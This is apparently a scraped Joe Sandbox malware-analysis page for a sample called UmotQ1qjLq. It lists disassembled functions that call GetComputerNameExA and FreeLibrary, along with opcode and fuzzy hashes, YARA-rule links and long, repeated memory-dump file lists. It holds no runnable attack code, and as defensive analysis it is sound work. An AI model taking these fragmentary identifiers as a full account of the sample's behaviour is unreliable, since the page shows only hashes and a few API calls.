Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce7875c535f71e5d2e194cc1ef58015e5d512514bf2d5a01221871a6b198a84
Instruction ID: fe396e709b49a70095de89c709ae608faa66349bb629991d04b4fc5452d7df6c
Opcode Fuzzy Hash: 5ce7875c535f71e5d2e194cc1ef58015e5d512514bf2d5a01221871a6b198a84
Instruction Fuzzy Hash: 43615977B443090BD718AEACCC8639AF7C2AB84310F4E857CA598DB392ED78DC049785

Function 00B3B842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00B3B875
GetComputerNameExA.KERNEL32(00000006,?,00000100), ref: 00B3B924

Strings

KHGN, xrefs: 00B3B89B

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: KHGN
API String ID: 2904949787-1032087821
Opcode ID: 9ebac9276f06365d3edfbf972c841e236d7aeddbdbb284181a07b40db236f485
Instruction ID: 071d2aa472334d225e11d67ff8de9ab48b227800fa73a6479efff1e79f33e9d6
Opcode Fuzzy Hash: 9ebac9276f06365d3edfbf972c841e236d7aeddbdbb284181a07b40db236f485
Instruction Fuzzy Hash: AC21A17010C3858EEB218F359860BFB7FE4DB9B345F28489DE1C9D7292CB35444A9B52

Function 00B3B840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00B3B875
GetComputerNameExA.KERNEL32(00000006,?,00000100), ref: 00B3B924

Strings

KHGN, xrefs: 00B3B89B

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: KHGN
API String ID: 2904949787-1032087821
Opcode ID: 21eed0dcc8a7d008bdb43a3bea73ccf3a2b185f34a003cac4f239523c87b10d2
Instruction ID: b982c6977b50fb4d01bef31d18723a4eaf6ec808546efb3b393251013f811878
Opcode Fuzzy Hash: 21eed0dcc8a7d008bdb43a3bea73ccf3a2b185f34a003cac4f239523c87b10d2
Instruction Fuzzy Hash: F811E7701483858FDB218F35D851BFB7FE4EB8A345F14486DE1C9D7251CB3544069B52

Function 00B3B94D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000005,11780A54,00000100), ref: 00B3BA54

Strings

bC, xrefs: 00B3B992

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: ComputerName
String ID: bC
API String ID: 3545744682-4190571504
Opcode ID: a9bd90b6701d46df1ae59d2a27b41fea9818ea66a25500d3b60e08daf2c3afe2
Instruction ID: c3165e611a9da9babce7a707ebcaafd39416a74314e8513e4f3e34827fb8fc92
Opcode Fuzzy Hash: a9bd90b6701d46df1ae59d2a27b41fea9818ea66a25500d3b60e08daf2c3afe2
Instruction Fuzzy Hash: 6621323240C7D18BD7348F2484907FABBE1EF86311F69899DC9CA9B241CE744409CB52

Function 00B3B948 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000005,11780A54,00000100), ref: 00B3BA54

Strings

bC, xrefs: 00B3B992

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: ComputerName
String ID: bC
API String ID: 3545744682-4190571504
Opcode ID: 5f231a4b39c89a7f97d057e03f12b2215da38484638622c716f1290f8cbb580f
Instruction ID: 8816edf96ecce35b3bf284e712dacea188ce120cab48a5fb81447bba83322746
Opcode Fuzzy Hash: 5f231a4b39c89a7f97d057e03f12b2215da38484638622c716f1290f8cbb580f
Instruction Fuzzy Hash: EA21F23654D791CBD734CF2084947BABBE2EFC5311F69899DC9CA9B240CE745809CB92

Function 00B3B7AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000006,?,00000100), ref: 00B3B924

Strings

KHGN, xrefs: 00B3B89B

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
